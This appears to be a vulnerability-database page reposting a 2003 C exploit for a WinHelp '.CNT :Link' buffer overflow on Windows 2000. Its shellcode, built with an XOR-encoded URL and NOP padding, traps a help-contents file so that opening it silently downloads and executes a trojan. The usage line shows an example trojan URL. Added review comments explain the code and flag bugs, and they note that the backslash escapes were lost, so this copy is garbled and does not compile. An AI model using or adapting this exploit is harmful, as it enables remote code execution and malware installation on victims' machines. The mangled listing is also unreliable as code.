Microsoft Windows Server 2000 – Help Facility ‘.CNT’ File :Link Buffer Overflow
漏洞ID | 1053748 | 漏洞类型 | |
发布时间 | 2003-03-09 | 更新时间 | 2003-03-09 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7102/info
The Microsoft Windows 2000 Help facility does not perform sufficient bounds checking on .cnt files. If a .cnt file containing an unusually long :Link URI was opened by the Windows Help facility, a buffer would be overrun, allowing the execution of arbitrary code.
/*************************************************
* s0h - Skin Of Humanity.
* http://s0h.cc
*
* Title : Win32hlp exploit for : ":LINK overflow"
* Date : Sunday, 9 March, 2003 1:00 AM
*
* -----------------------------------------------
*
* Archive : http://s0h.cc/exploit/s0h_Win32hlp.c
* Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe
*
* -----------------------------------------------
* Discovered by ThreaT <[email protected]>.
* Coded by ThreaT <[email protected]>
* Homepage : http://s0h.cc/~threat/
*
* Winhlp32.exe exploit for ':LINK' overflow !
*
* -----------------------------------------------
*
* This exploit can trap a .CNT file (the file that
* accompanies .HLP files) with arbitrary code that
* can download and execute a trojan without asking the user.
*
* -----------------------------------------------
*
* Compiling : cl /nologo s0h_Win32hlp.c
* Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset]
* Eq : C:>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:WINNTHelpmplayer2.cnt 4
*
* <trojan> = host to download the trojan (http:/-
* /blah.plof/trojan.exe).
*
* <CNT file> = The CNT file.
*
* [offset] = Optional. Defines a number between 0
* and 15 that adjusts the return address. Generally
* you must use 4 if the .HLP file is called by an
* application.
*
* -----------------------------------------------
* This exploit was tested on :
* - Windows 2000 PRO/SERVER (fr) SP0
* - Windows 2000 PRO/SERVER (fr) SP1
* - Windows 2000 PRO/SERVER (fr) SP2
*
************************************************/
#include <windows.h>
#define taille 270
#define VulnLen 650
/*
 * Entry point.  Rewrites the .CNT file named by argv[2] in place so that it
 * starts with one VulnLen-byte ":Link " line (0x90 padding followed by the
 * Shellcode buffer assembled below), then CR LF, then the file's original
 * contents.  argv[1] is the URL the stub is meant to fetch; it is
 * XOR-obfuscated with 0x99 and appended after the stub.  argv[3] (optional)
 * adjusts one byte of the 4-byte address written at the end of Shellcode.
 *
 * NOTE(review): this copy of the listing has lost its backslashes (the
 * "x68x5E..." byte strings and the "n" line endings print without "\"),
 * so it does not compile verbatim; the comments below describe the intended
 * structure, not bytes that can be confirmed from this copy.  printf,
 * malloc, strlen, atoi and memset have no explicit header here; the build
 * presumably relied on whatever <windows.h> pulls in under MSVC.
 *
 * Returns 0 on success; the process exits with status 1 on a usage error or
 * when the target file cannot be opened.  The target is modified with no
 * backup.
 */
int main (int argc, char *argv[]) {
HANDLE ExploitFile;
// lpNumberOfBytesWritten is also reused as the ReadFile byte count below.
DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize;
// RetByte: the variable byte of the trailing 4-byte address.  0xE5 is the
// default used when no [offset] argument is given (see the final printf).
int i,j, len, RetByte=0xE5;
// url keeps a plaintext copy of argv[1] for the final report, because
// argv[1] itself is XOR-encoded in place further down.
char *file, *url;
// Shellcode: stub + encoded URL + 2 trailer bytes + 4 address bytes (len
//            bytes in total, see the len computation below).
// buffer:    the VulnLen-byte ":Link " line written to the front of the file.
// RealGenericShellcode: the fixed stub; only its first `taille` bytes are
//            copied into Shellcode.  As printed here the "\x" escapes are
//            gone, so the literal is plain ASCII text.
unsigned char *Shellcode, *buffer,
RealGenericShellcode[] =
"x68x5Ex56xC3x90x8BxCCxFFxD1x83xC6x0Ex90x8BxFExAC"
"x34x99xAAx84xC0x75xF8"
"x72xebxf3xa9xc2xfdx12x9ax12xd9x95x12xd1x95x12x58x12xc5xbdx91"
"x12xe9xa9x9axedxbdx9dxa1x87xecxd5x12xd9x81x12xc1xa5x9ax41x12"
"xc2xe1x9ax41x12xeax85x9ax69xcfx12xeaxbdx9ax69xcfx12xcaxb9x9a"
"x49x12xc2x81xd2x12xadx03x9ax69x9axedxbdx8dx12xafxa2xedxbdx81"
"xedx93xd2xbax42xecx73xc1xc1xaax59x5axc6xaax50xffx12x95xc6xc6"
"x12xa5x16x14x9dx9ex5ax12x81x12x5axa2x58xecx04x5ax72xe5xaax42"
"xf1xe0xdcxe1xd8xf3x93xf3xd2xcax71xe2x66x66x66xaax50xc8xf1xec"
"xebxf5xf4xffx5exddxbdx9dxf6xf7x12x75xc8xc8xccx66x49xf1xf0xf5"
"xfcxd8xf3x97xf3xebxf3x9bx71xccx66x66x66xaax42xcaxf1xf8xb7xfc"
"xe1x5fxddxbdx9dxfcx12x55xcaxcaxc8x66xecx81xcax66x49xaax42xf1"
"xf0xf7xdcxe1xf3x98xf3xd2xcax71xb5x66x66x66x14xd5xbdx89xf3x98"
"xc8x66x49xaax42xf1xe1xf0xedxc9xf3x98xf3xd2xcax71x8bx66x66x66"
"x66x49x71xe6x66x66x66";
// Banner.  NOTE(review): the inner quotes around ":LINK overflow" on the
// fifth line would terminate the literal as printed; presumably "\"" and
// "\n" escapes were lost in extraction.
printf (" * ***************************************************** *n"
" * s0h - Skin of humanity *n"
" * http://s0h.cc/ *n"
" * ***************************************************** *n"
" Win32hlp exploit for : ":LINK overflow" *n"
" * ***************************************************** *n"
" * Discovered by ThreaT <[email protected]>. *n"
" * Coded by ThreaT <[email protected]> *n"
" * Hompage : http://s0h.cc/~threat/ *n"
" * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c *n"
" * ***************************************************** *n"
);
// Usage check: <trojan> and <CNT file> are both required.
if (argc < 3)
{
printf(
" * ***************************************************** *n"
" * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *n"
" * *n"
" * <trojan> = host to download the trojan (http:/- *n"
" * /blah.plof/trojan.exe). *n"
" * *n"
" * <CNT file> = The CNT file. *n"
" * *n"
" * [offset] = Optionnal. This one defined a number betw- *n"
" * een 0 and 15 that can play with the return address. - *n"
" * Generaly, you must used 4 if the .HLP file is called *n"
" * by an application. *n"
" * ***************************************************** *n"
);
ExitProcess (1);
}
// argv[argc] is NULL by the C standard, so the test is safe when argc == 3.
// The offset is not range-checked against the documented 0..15; only the
// low byte of RetByte ends up in Shellcode[len-3] below.
if (argv[3]) RetByte = atoi (argv[3]) + 0xE0;
// Shellcode layout: indices 0..taille-1 stub, then the URL, then the two
// trailer bytes at len-6 / len-5 and the 4-byte address at len-4..len-1.
len = taille + strlen (argv[1]) + 2 + 4;
// NOTE(review): malloc(strlen(argv[1])) leaves no room for the terminator
// that strcpy writes (one-byte heap overrun); the result is not NULL-checked.
url = (char *) malloc (strlen (argv[1]));
strcpy (url, argv[1]);
/*
* Create the final shellcode
*/
// Not NULL-checked.
Shellcode = (unsigned char *) malloc (len);
// encrypt the URL
// XOR every byte of argv[1] in place with key 0x99; url above keeps the
// clear-text copy for the final report.
for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99);
// inject the RealGenericShellcode in the shellcode buffer
// Copies the first taille bytes of the stub.  NOTE(review): `i` is read on
// the left and incremented on the right of the same unsequenced assignment,
// which is undefined behavior in C.
for (i=0;i<taille; Shellcode[i]=RealGenericShellcode[i++]);
// append crypted URL to the shellcode buffer
// "i,j=0" is a comma expression: only j is reset, i continues from taille.
// The loop runs strlen(argv[1])+5 times, so it reads 4 bytes past the
// URL's terminator; the Shellcode slots those land in (len-5..len-2) are
// overwritten just below.
for (i,j=0;i<len - 1;Shellcode[i++]=argv[1][j++]);
// 0x99 is the same value as the XOR key applied to the URL above.
Shellcode[len-6]=0x99; // URL delimitation
Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser
// append the RET ADDR
// Play with this bytes if the xploit don't work
// Little-endian 4-byte value 0x0006<RetByte>30, as reported by the last
// printf in this function.
Shellcode[len-4]=0x30;
Shellcode[len-3]=RetByte;
Shellcode[len-2]=0x06;
Shellcode[len-1]=0x00;
/* Now, we make a vuln string for our exploit */
// buffer: ":Link " (lstrcpy also writes a terminator at index 6, which the
// fill below overwrites), 0x90 (x86 NOP) padding up to VulnLen-len, then
// Shellcode.  The second loop runs to VulnLen, i.e. exactly len iterations
// when len <= VulnLen-6.  NOTE(review): nothing checks that condition; with
// a longer URL the first loop does nothing and the Shellcode copy is
// silently truncated rather than rejected.  malloc is not NULL-checked.
buffer = (unsigned char *) malloc (VulnLen);
memset (buffer,0,VulnLen);
lstrcpy (buffer,":Link ");
for (i=6; i < VulnLen - len; buffer[i++] = (char)0x90);
for (i,j=0; i < VulnLen; buffer[i++] = Shellcode[j++]);
/* Trap the CNT file specified with the vuln string */
// Open the target read/write; OPEN_EXISTING means it must already exist.
// On failure the error is reported without GetLastError and the process
// exits with status 1.
ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE,
FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if ( ExploitFile == INVALID_HANDLE_VALUE) {
printf ("Error : cannot open cnt file '%s'n",argv[2]);
ExitProcess (1);
}
// GetFileSize returns the low DWORD and stores the high DWORD through the
// pointer; its INVALID_FILE_SIZE error return is not checked.
FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh);
// NOTE(review): MAXDWORD is 0xFFFFFFFF, so this is not a 32-bit shift; the
// sum is only meaningful when lpFileSizeHigh == 0 (a DWORD could not hold a
// larger size anyway).
FileSize += lpFileSizeHigh*MAXDWORD;
// LPTR = fixed, zero-initialized block of FileSize+2 bytes: CR LF first,
// then the original contents read at offset 2.  The block is never freed
// (the process exits shortly after) and LocalAlloc is not NULL-checked.
file = (char *)LocalAlloc (LPTR, FileSize + 2);
file[0] = 0x0d;
file[1] = 0x0a;
file += 2;
// NOTE(review): ReadFile, SetFilePointer and both WriteFile calls are
// unchecked, so a short read or write goes unnoticed.
ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL);
// Rewrite from offset 0: the VulnLen-byte ":Link " line, then CR LF plus
// the original contents.  The file grows by VulnLen+2 bytes and is
// overwritten in place with no backup.
SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN);
WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL);
file -= 2;
WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL);
CloseHandle(ExploitFile);
// Report: argv[2] is the modified file, url the clear-text URL copy.
printf (
" * *******************************************************n"
" * The file is now traped and ready to download and exe- *n"
" * cute : *n"
" * File : %sn"
" * At : %sn"
" * *******************************************************n"
,argv[2],url);
// Only shown when [offset] changed RetByte from the default; an explicit
// offset of 5 also yields 0xE5 and is therefore reported as the default.
if (RetByte != 0xE5)
printf (
" * *******************************************************n"
" * You have specified this address : 0x0006%x30 *n"
" * The abitrary will loaded since an application. *n"
" * *******************************************************n"
,RetByte);
// url, Shellcode and buffer are intentionally left to the process exit.
return 0;
}